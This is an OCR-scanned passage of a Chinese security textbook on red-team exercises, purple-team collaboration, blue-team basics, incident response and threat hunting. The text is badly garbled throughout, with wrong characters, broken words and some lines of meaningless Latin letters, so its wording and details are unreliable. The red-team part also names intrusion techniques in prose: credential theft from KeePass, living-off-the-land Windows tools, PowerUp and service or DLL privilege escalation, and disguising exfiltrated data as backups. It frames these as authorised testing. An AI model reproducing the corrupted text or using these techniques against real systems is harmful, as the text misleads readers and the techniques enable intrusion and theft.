工具 包 )， 可 从 未 加 锁 的 数据 库 内 存 中 提取 密 钥 信息 。 但 KeePass 本 映 包 含 存储 在 
KeePass.config.xml 中 的 事件 -条 件 -触发 系统 (Event-Condition-Trigger-System), 并 不 需 
要 滥用 恶意 软件 。 

一 旦 获得 任 证 ， 红 队 即 使 运用 技术 含量 不 高 的 方法 或 人 工 方 法 也 能 取得 辉 焊 战 
果 。 公 司 往往 将 权限 设置 得 过 高 ， 或 未 对 数据 进行 加 密 。 这 样 ， 浏 贤 一 所 公司 的 共 
享 文件 就 能 获取 十 分 可 观 的 信息 。 虽 然 一 些 红 队 能 够 自行 创建 高 级 工具 ， 但 现实 状 
况 是 ， 开 发 日 定义 工具 所 需 的 投资 收 不 到 相应 的 回报 。 实 际 上 ， 利 用 现成 工具 融入 
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环境 称 为 “靠山 吃 山 , 菲 水 吃水 ” 可 供 使 用 的 工具 有 wmic.exe、 msbuild.exe、 net.exe、 
nltest.exe 以 及 长 右 不 误 的 Sysinternals 和 PowerShell。 

此 外 ， 考 虑 攻击 对 果 面 具有 本 地 管理 权限 的 用 户 组 。 组 织 的 开 有 友人 员 经 单 被 本 
为 VIP， 对 这 些 人 员 的 系统 采取 的 安全 控制 较 少 。 公 司 的 IT 团 队 也 是 如 此 。 许 多 IT 
人 员 在 日 章 工 作 中 仍然 使 用 域 管理 账户 ， 而 且 不 知道 应 当 尽 量 少 用 此 类 账户 。 夯 外 
考虑 攻击 那些 回避 参加 安全 意识 培训 的 小 组 。 组 织 的 高 级 管理 层 往 往 是 攻击 目标 ; 
具有 讽刺 意味 的 是 ， 这 些 人 员 经 常 缺 席 安 全 培训 。 

权限 提升 方法 专注 于 将 权限 提升 为 本 地 管理 员 ， 但 组 织 也 开始 意识 到 让 每 个 人 
员 都 成 为 本 地 管理 员 的 风险 。PowerUp 十 一 个 独立 的 PowerShell 工 具 ， 此 类 工具 针对 
大 量 稼 见 的 权限 提升 误 配 置 目 动 友 起 攻击 ， 特 别 适 于 提升 权限 。 有 很 多 权限 提升 选 
项 可 供 使 用 ， 包 括 手动 操纵 服务 通过 修改 binPath 触 发 恶意 命令 ， 利 用 与 服务 相关 的 
二 进 制 代 码 上 的 误 配 置 权限 、%PATH% 支 持 以 及 利用 DLL 加 载 顺 序 等 。 

搜索 未 经 保护 的 虚拟 机 备份 。 评 估 人 员 可 在 普通 的 文件 服务 器 上 发 现 很 多 有 价 
值 的 信息 。 无 数 事实 证 明 ， 在 很 多 组 织 中 ， 使 用 默认 攒 证 仍 是 获取 访问 权限 的 可 徘 

要 从 环境 中 提取 数据 ， 首 先 要 确保 按照 评估 的 合约 准则 获得 了 批准 。 然 后 采取 
有 创意 的 方式 从 环境 中 删除 数据 。 人 例如， 一些 红 队 评估 人 员 将 数据 伪 少 成 异地 备份 
数据 。 


7.9 了 吸取 的 教训 


红 队 行动 中 执行 的 事后 分 析 通 第 十 分 详细 ， 对 传播 知识 大 有 好 处 。 红 队 评 佑 需 
要 重点 关注 “一 边 行动 , 一边 做 好 文档 记录 ”捕获 的 信息 要 有 助 于 组 织 执行 详细 分 
析 ， 了 解 哪些 是 可 行 的 ， 哪 些 需要 重新 设计 。 此 类 评估 后 分 析 通 单 称 为 行动 小 结 报 
告 (After Action Report, AAR). 

AAR 应 当 从 不 同 的 视角 总 结 所 吸取 的 教训 。 也 要 记录 那些 成 功 的 经 验 ， 详 细 了 
解 哪些 工具 和 流程 是 有 效 的 ， 有 助 于 组 织 在 未 来 的 工作 中 复制 成 功 。 纳 入 不 同 的 视 
角 也 意味 着 从 不 同 的 团队 和 来 源 捕获 信息 。“ 教 训 ” 可 来 自 看 似 不 相关 的 来 源 ， 进 入 
AAR 的 意见 和 建议 越 多 ， 遗 漏 重 要 观察 结论 的 可 能 性 越 低 。 

组 织 的 领导 层 应 当 使 用 AAR 作 为 制定 战略 计划 的 参考 ， 并 在 此 基础 上 为 需要 解 
决 的 特定 控制 差距 制定 修正 计划 。 
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7.10 ”本草 小 结 


红 队 演练 是 秘密 进行 的 道德 黑客 攻击 演练 , 对 蓝 队 保密 。 让 葛 队 负责 保卫 目标 ， 
这 样 ， 组 织 可 通过 与 现实 攻击 极其 接近 的 模拟 攻击 ， 了 解 安全 控制 过 程 和 应 急 啊 应 
过 程 的 有 效 性 。 红 队 演 练 会 限制 信息 的 交流 ， 限 制 红 队 和 蓝 队 的 交互 。 如 果 组 织 有 
成 熟 的 安全 程序 ， 已 经 投入 大 量 工作 来 建立 和 测试 安全 控制 的 有 效 性 ， 那 么 红 队 演 
练 可 带 来 最 大 好 处 。 如 果 组 织 还 在 构建 安全 程序 ， 还 在 完善 安全 控制 措施 和 流程 ， 
那么 紫 队 演练 可 带 来 最 大 好 处 。 下 一 章 将 介绍 紫 队 演练 ， 此 类 演练 中 的 协作 和 交流 
较 频 繁 。 通 过 进行 紫 队 演练 ， 可 促使 组 织 进 步 ， 达 到 为 经 受 红 队 演 练 的 秘密 攻击 做 
好 准备 的 水 平 。 
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kikk, BREI: 不 知 彼 而 知己 ,一 胜 一 负 : Hoth, KFT, ARIS. 
一 一 《孙子 。 谋 攻 篇 》 


对 于 一 个 安全 态势 正在 走 同 成 熟 的 组 织 而 言 ， 紫 队 古 最 有 价值 的 。 系 队 允 许 防 
御 安 全 团队 ( 即 蓝 队 ) 与 攻击 团队 ( 即 红 队 ) 协 同 工 作 。 攻 和 守 双 方 的 协作 为 不 断 改进 提供 
了 强大 的 循环 动力 。 紧 队 更 像 是 与 合作 伙 们 争论， 而 不 是 猛烈 地 展开 拳击 战 。 凤 队 
演练 对 技能 和 流程 的 完善 大 有 好 处 ; 只 有 实际 站 壳 严 香 攻击 事件 时 得 到 的 经 验 可 与 
这 种 好 处 相提并论 。 和 此 队 将 红 队 与 下 队 的 工作 结合 起 来 ， 最 终 目 标 是 使 组 织 的 安全 
态势 达到 成 熟 的 程度 。 

本 章 从 不 同 视 角 讨 论 迷 队 。 上 自 先 介绍 柴 队 的 基础 知识 ， 接 看 讨论 监 队 的 行动 ， 
此 后 更 为 详细 地 讨论 么 队 的 行动 ， 最 后 讨论 意 队 如 何在 么 队 演 练 期 间 优 化 工作 。 


本 草 计 论 的 主题 如 下 : 
紫 队 简介 

Hi BANAT 

条 队 的 行动 

紧 队 的 优化 和 目 动 化 


8.1 NBT 


“协作 ”是 紫 队 工作 的 核心 。 紫 队 人 允许 红 队 和 瘟 队 在 演练 期 间 密 切 协作 ， 上 反复 
地 攻击 和 防御 茶 个 特定 目标 ， 从 而 改进 红 队 和 葡 队 双方 的 搁 能 和 流程 。 紫 队 演 练 与 
红 队 演练 丢 别 很 大 。 在 红 队 演练 中 ， 红 队 和 到 队 大 多 数 时 间 的 交流 部 古 受 限 的 ， 甚 
至 是 茶 止 的 ;， 红 队 对 目标 知之 甚 少 。 在 此 队 演练 中 ， 红 队 将 攻击 特定 目标 、 设 备 、 
应 用 程序 、 业 务 流程 、 运 营 流 程 及 安全 控制 指 施 等 。 红 队 将 与 下 队 协作 ， 了 解 安全 
控制 状况 并 加 以 改进 ， 直 至 蓝 队 可 以 (甚至 可 以 高 效 地 ) 检 训 到 攻击 并 阻止 攻击 为 止 。 
在 阅读 本 章 内 容 前 务必 阅读 第 7 革 ， 本 章 的 内 容 建立 在 第 7 章 的 基础 之 上 。 
有 人 混淆 了 “ 些 队 ”与 “日 队 ” 的 概念 。 如 上 一 章 所 述 ， 日 队 促进 了 红 队 和 监 
队 之 则 的 交流 ， 并 提供 监督 和 指导 。 日 队 骨 第 由 主要 利益 相关 方 以 及 项 目 促 进 者 组 
成 。 日 队 不 是 搁 术 团队 ， 不 参与 目标 的 攻击 或 防御 。 烷 队 不 是 日 队 。 紫 队 既 是 技术 
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攻击 团队 也 是 防御 团队 ， 攻 击 团 队 和 防御 团队 按照 合约 中 的 规定 一 起 工作 ， 练 习 对 
目标 的 攻防 。 不 过 ， 紫 队 都 与 白 队 (项 目 经 理 、 业 务 联络 人 、 主 要 利益 相关 方 ) 共 事 。 

紧 队 的 规模 未 必 那 么 大 ， 那 么 复 林 。 开 始 时 ， 可 以 只 是 一 名 竖 队 成 员 和 一 名 红 
队 成 员 合 作 ， 对 特定 的 产品 和 应 用 程序 进行 测试 和 加 国 。 前 和 面 介绍 过 ， 迷 队 可 以 更 
好 地 保护 企业 安全 ， 开 始 时 规模 小 点 也 可 接受 ， 不 必 搞 得 声势 泊 大 。 紧 队 不 圾 要 成 
为 大 团队 ， 但 要 求 团队 成 员 午 握 成 熟 的 技能 集 。 如 果 能 让 最 好 的 焉 队 成 员 与 最 好 的 
红 队 成 员 一 起 工作 ， 那 融 等 看 看 好 戏 吧 ! 

很 多 组 织 以 专注 于 特定 类 型 的 攻击 (例如 钓鱼 攻击 ) 来 局 动 烷 队 行动 。 开 始 时 要 
确定 一 个 可 以 实现 的 目标 ， 这 一 点 最 重要 。 例 如 ， 可 将 目标 确定 为 专门 测试 和 提高 
蜡 队 的 技能 集 ， 或 提 局 对 拒绝 服务 攻击 或 勒 宗 软 件 攻击 竺 特别 类 型 的 攻击 的 啊 应 能 
力 。 此 后 ， 对 于 每 个 目标 ， 紫 队 演 练 者 将 专注 于 提 噩 和 改进 流程 及 控制 撞 施 ， 和 直到 


满 丰 预先 确定 的 成 功 标准 。 
紫 队 测试 的 一 个 腕 点 是 : 能 将 过 去 的 攻击 纳入 考虑 郊 围 , TOPE AB Seal A 


一 种 结局 (Alternate Endings)”。 紫 队 对 过 去 的 攻击 重新 制定 男 一 种 啊 应 方式 ， 选择 为 
一 种 冒险 方式 ， 这 可 以 十 分 有 效 地 确定 未 来 的 最 佳 行动 路 线 。 紫 队 尘 练 应 当 玛 励 览 
队 和 红 队 将 当前 标准 操作 过 程 (Standard Operating Procedures, SOPHIES ra. FET 
允许 啊 应 者 玉 取 灵活 的 、 有 创意 的 防御 方式 。 紫 队 提 供 的 价值 大 多 在 于 允许 防御 者 
演练 临时 决策 。 目 标 是 通过 模拟 ， 使 小 组 得 到 锻炼 。 针 对 通常 在 事件 的 事后 分 析 阶 
段 作 为 “吸取 的 教训 ”处 理 的 问题 进行 演练 ， 鼓 励 进行 更 深入 的 思考 ， 提 高 决策 的 
FA SE o 
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定义 可 衡量 的 事件 、 理 解 威胁 、 使 用 攻击 框架 、 使 用 目 适 应 测试 方法 以 及 吸取 教训 
都 适用 于 紫 队 演练 。 紫 队 测 试 期 间 ， 红 队 与 蓝 队 协作 和 交互 ， 会 对 规划 和 执行 方式 
产生 影响 。 本 章 首 先 讨 论 赣 队 的 基本 行动 ， 接 痢 讨 论 紧 队 演练 中 ， 红 队 与 监 队 应 议 
如 何 优化 他 们 的 工作 方式 。 


8.2 监 队 的 基本 行动 


全 球 最 优秀 的 网 络 防御 者 已 经 接受 了 “在 谋略 上 要 胜 过 侵略 方 ”这 一 挑战 。 以 
安全 方式 运行 一 个 企业 并 不 是 一 件 简单 的 任务 。 从 新 闻 中 可 以 了 解 到 ,“ 保 护 性 ”和 
“检测 性 ”安全 控制 措施 会 以 各 种 方式 失效 。 防 御 者 可 以 通过 不 同方 式 更 好 地 响应 
网 络 事故 以 及 从 事故 中 恢复 。 为 了 在 防止 组 织 受到 网 络 威胁 和 防止 团队 成 员 犯 错 之 
间 取 得 平衡 ， 为 了 确保 满足 业务 目标 ， 需 要 使 战略 安全 计划 与 明确 的 行动 安全 实践 
保持 一 致 。 在 开始 讨论 紫 队 以 及 防止 环境 受到 网 络 威胁 的 高 级 技术 之 前 ， 将 首先 讨 
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论 基本 的 防御 手段 。 

追捕 坏人 听 起 来 令 人 刺激 ， 但 网 络 防御 的 很 多 方面 其 实 是 枯燥 乏味 的 。 规 划 、 
准备 和 加 固 环 境 以 防 受 到 网 络 威胁 是 安全 工作 中 最 不 受 待 见 、 最 容易 被 人 忽视 的 方 
面 ， 但 这 些 方面 是 必需 的 ， 而 且 是 十 分 重要 的 。 此 处 要 简单 介绍 安全 程序 中 一 些 重 
要 的 基础 方面 ， 以 便 将 来 可 以 在 此 基础 上 进一步 扩展 知识 面 。 这 里 将 介绍 基本 的 蓝 
队 知识 ， 涵 盖 紫 队 演练 和 规划 信息 ， 讲 述 框架 资源 、 工 具 和 方法 论 ， 为 紫 队 行动 提 
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82.1 了 解 敌 人 


了 解 过 去 受到 过 哪些 人 攻击 的 相关 信息 ， 将 有 助 于 确定 工作 的 优先 顺序 。 坚 无 
疑问 , 最 密切 相关 的 是 有 关 过 去 的 攻击 和 攻击 者 的 内 部 信息 。 当然 也 有 外 部 信息 源 ， 
如 免费 的 威胁 情报 源 。 很 多 商业 产品 也 提供 威胁 情报 信息 。 可 收集 和 存储 过 去 的 入 
侵 指标 (ndicators Of Compromise，IOC) 以 及 相关 的 威胁 情报 ， 分 析 一 个 环境 的 攻击 
趋 势 ， 进 而 为 制定 防御 保 略 (包括 文档 手册 、 控 制 指 施 选择 、 控 制 指 施 实 施 以 及 测试 
等 ) 提 供 参 考 信 息 。 

许多 安全 事件 都 源 于 组 织 内 部 。 只 要 有 人 参与 到 行为 中 ， 那 么 人 为 错误 始终 网 
会 与 一 些 安 全 事件 有 关 。 如 采 可 以 使 用 有 效 攒 证 进行 数据 渗透 ， 则 说 明 存 在 内 部 威 
胁 。 内 部 威胁 有 多 种 形式 ， 如 心怀 不 满 的 员工 、 员 工 受 到 胁迫 或 被 收买 从 事 恶 意 活 
动 等 。 安 全 程序 必须 覆 坊 内 部 威胁 程序 ， 这 有 助 于 为 防范 内 部 威胁 做 好 准备 。 最 住 
的 预防 措施 是 专门 安排 针对 内 部 威胁 的 紧 队 演练 。 有 些 组 织 负责 调查 与 内 部 威胁 安 
全 事件 相关 的 人 为 因 系 ， 无 论 根 源 是 人 为 错误 、 人 为 攻击 还 是 心怀 不 满 。 


822 了 解 目 己 


如 果 控 制 了 一 个 环境 ， 则 证 明 测试 人 员 对 这 个 环境 比 恶 意 攻 击 者 了 解 得 更 多 。 
要 控制 技术 环境 ， 首 先 要 了 解 相关 硬件、 软件 和 数据 的 详细 信息 ， 特 别 要 了 解 机 密 
的 / 受 保护 的 / 专 有 的 (Sensitive/Protected/Proprietary) 数 据 和 数据 流 。 这 意味 看 实时 精 
确 地 了 解 系统 或 环境 的 流程 、 数 据 流 和 技术 组 件 。 不 仅 要 详细 了 解 环 境 ， 还 要 控制 
环境 ， 即 阻止 未 经 授权 的 变更 和 添加 ， 或 者 至 少 及 时 地 检测 和 解决 这 些 问题 。 甚 至 
要 能 强调 哪些 组 件 和 配置 实践 与 预期 背离 。 在 安全 领域 ， 这 些 都 是 大 家 耳熟能详 的 
概念 。 安 全 构建 要 得 到 批准 ， 要 防止 未 经 授权 的 变更 , 这 是 大 多 数组 织 的 标准 做 法 。 

要 维护 对 环境 的 高 级 别 控制 , 男 一 个 考虑 因素 是 限制 或 禁止 人 员 / 用 户 与 环境 的 
交互 。 在 云 环 境 中 ， 这 种 做 法 尤为 有 效 。 考 虑 使 用 工具 创建 无 界面 模式 (Headless 
Build)， 用 命令 行 奉 代用 户 界 面 (GUD， 编 写 脚 本 并 目 动 完成 活动 以 避免 用 户 经 第 与 
环境 交互 。Terraform 是 一 个 开源 项 目 ， 使 用 基础 架构 即 代码 (Cnfrastructure as Code, 
IAC) 概 念 定义 基础 架构 ， 使 用 代码 创建 配置 文件 ， 可 像 其 他 代码 一 样 共 享 、 编 辑 并 


139 


140 


第 1| 部 分 ”从 业务 角度 分 析 黑 客 攻 击 


进行 版 本 控制 。 
准备 紧 队 演练 与 准备 红 队 演练 有 所 不 同 ， 这 是 因为 在 一 些 悄 况 下 ， 迪 队 需要 与 


红 队 共享 更 多 的 演练 信息 。 在 确定 紫 队 行动 范围 时 ， 表 现 尤其 明显 。 通 常会 对 那些 
熟悉 测试 目标 的 人 员 进行 访谈 ， 并 与 红 队 共享 系统 文档 和 数据 流 。 这 人 允许 红 队 精细 
调整 测试 活动 , 确定 管理 角色 、 威 胁 模型 以 及 划 定 行动 范围 时 需要 考虑 的 其 他 信息 。 


8.2.3 安全 程序 


安全 小 组 必须 完成 许多 重要 功能 ， 最 合理 的 组 织 方式 是 与 安全 框架 保持 一 致 。 
没 必 要 另起炉灶 ;事实 上， 不 或 励 任 何 组织 开 发 与 成 熟 框 巢 完全 不 同 的 框架 。 成 诸 
的 框架 有 美国 国家 标准 与 技术 研究 院 (National Institute of Standards in Technology, 
NIST) 网 络 安全 框架 和 ISO 27001 和 27002 等 ,这些 框 架 已 经 用 了 相当 长 的 时 间 , 汲取 
了 许多 专家 的 意见 和 建议 。 

当然 可 对 这 些 框 染 进行 调整 和 扩展 , 实际 上 , 很 多 组 织 都 会 经 钊 调 整 这 些 框 如 ， 
开发 出 为 组 织 量 里 定制 的 版 本 。 不 过 ， 在 删除 一 个 框 淋 的 某 一 部 分 或 子 类 时 ， 需 要 
高 上 度 警惕 。 在 安全 程序 评估 中 ， 经 第 会 看 到 整个 区 域 显 示 为 “不 可 用 GYA)”， 这 看 
SOMA. AIM, TEPER SEA A ZED ASIA TE MFCR A AE 
He ERREA. BZD EBA E EE EP EN IK ASA IAS e 
A RRA IT VE f LE mti WA CE, 8753 RAB EY 7 « 


8.2.4 SENSN tere 


一 个 成 熟 的 事故 啊 应 (ncident Response, IDIF EAB TANF. AFA Tt 
程 ， 可 以 确保 能 检测 到 攻击 ， 并 及 时 有 效 地 响应 。 紫 队 可 专注 于 事故 响应 的 特定 领 
域 ， 促 使 及 计划 走 同 成 熟 ， 直 至 检测 、 提 升 啊 应 速度 以 及 缩短 最 终 恢 复 时 间 。 与 安 
全 的 其 他 很 多 方面 类 似 , 一 个 恨 好 的 琢 过 程 最 好 遵循 NIST 的 计算 机 安全 事故 处 理 指 
PA(SP 800-6172) 等 行业 标准 。 当 阅读 指南 文档 的 每 个 部 分 时 ， 思 考 如 何 将 其 中 的 信 
EZH PHRI R. NIST 计 算 机 安全 事故 处 理 指南 为 琢 生 命 周期 定义 了 以 下 四 
个 阶段 : 

e 准备 

e 检测 和 分 析 

e 过 制 、 根 除 和 恢复 

e 善后 活动 

强烈 建议 组 织 将 该 指南 作为 了 豚 计 划 的 基础 。 如 果 组 织 的 了 豚 计 划 基 于 NIST 计 算 机 
安全 事件 处 理 指 南 ， 则 组 织 已经 考虑 了 资产 管理 、 检 测 工具 、 事 件 分 类 标准 、 卫 团 
队 结 构 、 关 键 供 应 两 、 服 务 水 平 协 议 (Service Level Agreements，SLA)、 啊 应 工具 、 
带 外 沟通 方法 、 备 用 会 场 、 角 色 、 职 责 、 耻 工作 流 和 遏制 策略 等 主题 。 
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作为 民 计 划 的 补充 , IRF Playbook) VAn. 下 手册 列 出 特定 操作 类 型 中 每 
个 角色 的 工作 步 又。 组 织 要 谨慎 地 为 广泛 的 操作 编写 文档 手册 , 这 些 包括 钓鱼 攻击 、 
分 布 式 拒绝 服务 攻击 (DDoS)、 网 页 揽 改 (Web Defacement), HARES. AK 
论 如 何 使 用 自动 化 文档 手册 。 需 要 对 这 些 文档 手册 进行 完善 ， 通 过 紫 队 演练 总 结 的 
教训 改进 琢 流 程 。 


1. 威胁 猫 杀 


持续 被 动 监测 (Passive Monitoring) 仍 不 够 有 效 。 当 今 和 未 来 的 防御 者 需要 采取 更 
多 主动 的 战术 ， 如 威胁 猪 杀 (Threat Hunting)。 在 威胁 猎 杀 演练 期 间 ， 紫 队 评 估 人 员 
主动 查找 那些 可 能 已 经 绕 过 安全 控制 并 潜入 环境 的 恶意 攻击 入 侵 者 ， 并 采取 强力 安 
全 对 策 。 目 的 是 赶 在 恶意 攻击 者 完成 目标 之 前 友 现 恶意 攻击 者 。 在 确认 恶意 攻击 者 
是 不 是 组 织 的 威胁 时 , 需要 考虑 三 个 因 系 : 从 事 人 破坏 的 能 力 (Capability)、 意 图 Cntenb 
和 机 会 (Opportunity)。 许 多 组 织 已 经 实施 了 条 些 形式 的 威胁 猫 杀 ， 但 不 成 体系 ， 未 
使 威胁 猫 杀 与 组 织 的 战略 目标 保持 一 致 。 

大 多 数组 织 的 威胁 猪 杀 功能 都 是 从 一 些 安 全 工具 开始 的 ， 这 些 工具 提供 自动 报 
警 ， 几 乎 不 需要 定期 收集 数据 。 通 前 ， 开 始 时 并 未 定制 标准 过 程 。 下 一 步 是 水 加 威 
胁 源 并 增加 数据 收集 。 一 旦 开始 常规 威胁 猎 杀 ， 就 开始 真正 定制 程序 。 随 着 威胁 猎 
共计 划 的 成 熟 ， 将 会 收集 到 越 来 越 多 与 威胁 源 相 天 的 数据 ， 这 将 为 组 织 提供 真正 的 
威胁 情报 。 反 过 来 ， 这 也 会 导致 对 基于 特定 环境 的 威胁 情报 进行 有 针对 性 的 搜索 。 

日 志 、 系 统 事 件 、NetFlow、 管 报 、 数 字 图 像 、 内 和 存 转 储 以 及 从 坏 境 中 收集 的 其 
他 数据 都 对 威胁 猪 杀 过 程 至 关 重 要 。 如 果 没 有 要 分 析 的 数据 ， 即 使 组 织 的 团队 掌握 
和 高 级 技能 集 ， 拥 有 最 佳 工 具 ， 紫 队 评 佑 人员 得 到 的 分 析 结 果 也 是 十 分 有 限 的。 一 旦 
有 了 合适 的 数据 ， 配 之 以 采用 机 器 学 习 并 有 具有 很 好 报告 功能 的 优 夯 分 析 工 具 ， 威 胁 
猪 杀 团队 将 受益 民 多 。 因 此 ， 一 旦 建立 了 访 程 ， 而 且 有 适当 的 工具 和 信息 用 于 威胁 
Saas, EANAIR, VA BAUR] DUE AR "ZR ZEBRA. 


2. Sum 


BOR AS DALY BUM AS HG 7J» m Ee TER DE ATTICI S EA d CFI ISTUD NS ULT 
合 ， 可 提供 有 关 环境 的 有 价值 的 安全 信息 。 组 织 应 当 从 以 下 所 有 设备 和 软件 收集 安 
Aas: 工作 站 、 服 务 规 、 网 络 设备 、 安 全 设备 、 应 用 程序 和 操作 系统 等 。 还 可 从 
NetFlow 行 储 、 完 整数 据 包 捕获 、 数 子 图 像 存 储 和 内 和 存 转 储 中 得 到 大 数据 集 。 部 普 在 
环境 中 的 安全 工具 也 生成 大 量 数据 。 可 从 以 下 安全 解决 方 采 中 收集 宇 叶 信息 ; 反 病 
毒 、 数 据 防 泄漏 DLP、 用 户 行为 分 析 UBA、 文 件 完整 性 监控 、 身 份 和 访问 管理 、 身 
份 验 证 、Web 应 用 程序 防火 场 、 人 代理、 远程 访问 工具 、 供 应 商 监 控 、 数 据 党 理 、 合 
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规 、 企 业 密码 保管 库 、 基 于 网 络 的 入 侵 检 测 系统 、 基 于 网 络 的 入 侵 防御 系统 、DNS、 
库存 清单 、 移 动 安全 、 物 理 安 全 以 及 其 他 安全 方案 。 组 织 将 使 用 这 些 数据 识别 针对 
组 织 发 起 的 攻击 活动 。 确 你 数据 源太 送 的 数据 是 正确 的 、 在 够 详细， 并 被 肥 壕 到 中 
心 存储 库 。 与 发 送 数 据 的 数据 源 相 比 ， 中 心 存储 库 的 保护 级 别 必须 更 高 。 确 你 即时 、 
频 壹 地 友 送 数据 也 很 午 要 ， 以 便 蓝 队 能 更 好 地 快速 啊 应 。 


3. 事故 响应 工具 


需要 使 用 工具 帮助 收集 、 关 联 、 分 机 和 组 织 拥 有 的 大 量 数据 。 此 处 必须 完成 一 
定 的 策略 规划 。 一 旦 理解 了 组 织 将 要 人 处理 的 数据 和 数据 源 ， 就 要 选择 工具 以 更 方便 
地 分 析 这 些 系统 和 数据 。 大 多 数组 织 起 初 基于 为 合 规 而 记录 的 数据 和 茶 止 记录 的 数 
HEMER. ZAZA i eG hs "Xi Right to be Forgotten)” AE, In 388 RI 
据 保 护法 规 (General Data Protection Resulation，GDPR)。 然 后 考虑 使 用 表面 提 到 的 

了 解 如 何 使 得 选取 的 琅 工 具 协 同 工 作 十 分 重要 。 特 别 是 必须 能 够 集成 了 工具 和 
其 他 工具 促进 数据 的 目 动 化 和 关联 。 当 然 ， 环 境 的 大 小 和 预算 的 多 少将 对 整体 工具 
宽 略 产生 影响 。 例 如 ， 可 能 需要 缘 合 和 关联 大 量 安全 数据 。 大 企业 可 能 最 终 依 徘 数 
据 湖 (Data Lake) 等 局 上 度 可 定制 的 解决 方案 ， 和 存储 和 分 析 大 数据 集 。 中 等 规模 的 组 织 
可 能 选择 安全 信息 事件 管理 (Security Information Event Management, SEM), JF 
将 其 与 大 量 组 织 己 经 使 用 的 数据 仓库 进行 集成 。 较 小 的 组 织 、 和 家庭 网 络 和 实验 军 环 
境 可 能 选择 一 些 不 错 的 免费 或 开源 工具 并 关联 引擎 和 数据 存储 库 。 

选择 [RR 工具 时 ， 确 保 调 人 查 期 间 使 用 的 分 析 工 具 可 以 方便 、 干 滔 地 删除 。 能 方便 
地 删除 工具 是 一 个 竺 要 因 系 ， 人 允许 组 织 灵 活 地 为 调查 使 用 目 适 应 方法 。 有 一 些 历经 
时 间 考 验 的 成 熟 产品 ， 也 有 大 量 开 源 工作 或 免费 工具 可 供 使 用 。 误 励 组织 符 试 结合 
使 用 商业 产品 和 免费 产品 ,直至 了 解 在 组 织 环境 的 各 种 情况 下 使 用 哪 种 方案 最 合适 。 
例如 ， 投 资 购买 了 Carbon Black Response 有 的 组 织 也 可 以 尝试 用 一 下 Google Rapid 
Response(GRR)， 并 实际 比较 二 者 的 效果 。 紫 队 渤 练 使 览 队 有 机 会 使 用 不 同 工 具 来 
啊 应 事故 。 这 样 ， 组 织 可 更 好 地 理解 哪 种 工具 在 环境 中 总 体 最 有 效 ， 哪 种 工具 在 特 
定 情形 下 效果 最 佳 。 


8.2.5 ”常见 的 监 队 挑 战 


与 拉 术 的 所 有 方面 类 似 ， 竖 队 也 面临 挑战 。 在 使 用 基于 签名 的 工具 时 ， 由 于 未 
能 检测 到 复杂 攻击 ， 可 能 会 产生 安全 错觉。 很 多 组 织 犹豫 是 个 用 基于 机 器 学 习 的 工 
具 来 蔡 代 基于 签名 的 工具 ， 通 第 的 打算 是 在 当前 基于 签名 的 工具 的 许可 证 到 期 后 ， 
再 进行 升级 。 因 此 ， 此 类 组 织 经 党 成 为 包括 详 如 勒索 软件 在 内 攻击 的 牺牲 品 。 如 果 
实施 过 红 队 演练 或 暴 队 演练 ， 这 些 组 织 束 会 深刻 理解 车 换 挥 效率 较 低 的 基于 签名 的 
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工具 的 重要 性 ， 那 样 将 可 以 揭 罕 安全 假象 ， 防 止 包括 款 索 软件 在 内 的 攻击 。 

有 些 组 织 低估 威胁 猫 杀 的 价值 ， 犹 光 是 否 要 建立 更 成 熟 的 威胁 猫 杀 程序 ， 担 心 
建立 这 样 的 程序 会 分 散 对 其 他 重要 工作 的 关注 。 人 手 不 足 、 资 金 不 足 的 组 织 可 通过 
使 痊 队 和 紫 队 的 行动 走 回 成 熟 ， 确 保 在 资源 有 限 的 条 件 下 制定 最 佳 决 策 ， 从 而 获得 
最 大 利益 。 采 取 被 动 的 网 络 安全 方法 风险 极 大 ， 是 过 时 的 做 法 。 组 织 现 在 理解 了 如 
何 通 过 威胁 猎 杀 和 紫 队 演练 更 好 地 防御 网 络 攻击 。 由 于 可 以 使 用 免费 工具 支持 红 队 、 
蓝 队 和 紫 队 的 行动 ， 有 可 能 会 腾 出 一 些 资金 用 于 人 员 配 备 和 培训 方面 ， 要 在 整个 组 
织 内 演示 威胁 猎 杀 的 价值 。 

如 果 组 织 对 风险 的 容忍 度 较 高 ， 那 么 证 明 “ 威 胁 猎 杀 ” 的 价值 以 及 劝导 组 织 进 
行 其 他 安全 投资 将 比较 困难 。 当 组 织 过 度 依赖 风险 转移 机 制 (例如 使 用 服务 提供 商 ) 
但 不 密切 监测 这 些 风 险 转 移 机 制 ， 或 者 严重 依赖 保险 并 选择 放 奔 实施 某 些 安全 控制 
措施 或 功能 时 ， 人 往往 会 友 生 这 种 情况 。 与 安全 的 大 多 数 方面 一 样 ， 在 劝导 时 ， 必 须 
始终 专注 于 对 业务 重要 的 方面 。 如 果 强 化 安全 的 起 因 是 组 织 关 心 的 人 喘 安 全 或 利益 
最 大 化 等 事项 ， 那 束 汗 示 网 络 攻 击 给 人 刁 安 全 市 来 的 风险 ， 并 针 示 攻击 可 能 导致 业 
务 停 运 从 而 对 利润 和 整个 公司 的 估 值 产生 影 啊 。 


8.3 ” 紧 队 的 基本 行动 


第 7 章 介绍 了 红 队 的 基本 行动 , 本 章 前 面 介 绍 了 蓝 队 的 基本 行动 , 下 面 将 详细 分 
析 紫 队 的 基本 行动 。 首 先 讨 论 一 些 指导 紫 队 工作 的 核心 概念 _ ”决策 框架 ， 以 及 用 
于 瓦解 攻击 的 方法 论 。 介 绍 了 这 些 核心 原理 后 ， 将 分 析 如 何 度量 安全 态势 的 改善 状 
况 ， 讨 论 紫 队 的 沟通 方式 。 


8.3.1 ARIER 


美国 空军 上 校 约翰 。 博 伊 德 (John Boyd) 创 建 了 OODA 循 环 , 这 是 一 个 决策 框架 ， 

用 四 个 阶段 创建 一 个 循环 。OODA 循 环 的 四 个 阶段 是 : 观察 (Observe)、 调 整 (Orient)、 

决策 (Decide) 以 及 行动 (Act)， 描 述 对 象 是 一 个 决策 制定 者 ， 而 非 一 组 决策 制定 者 。 

实践 中 要 更 复杂 一 些 ， 因 为 通常 需要 与 其 他 人 协作 并 取得 一 致意 见 。 下 面 简单 描述 
OODA 循 环 的 四 个 阶段 : 

e 观察 ”这 是 进入 决策 流程 的 原始 输入 信息 。 在 制定 决策 时 ， 必须 按 顺 序 处 理 
原始 输入 信息 。 

e 调整 在 考虑 已 有 的 经 验 、 个 人 偏见 、 文 化 传统 和 已 掌握 的 信息 时 ,组 织 需 

要 进行 自我 调整 。 这 是 OODA 循 环 最 重要 的 部 分 。 对 信息 进行 有 意 处 理 ， 从 

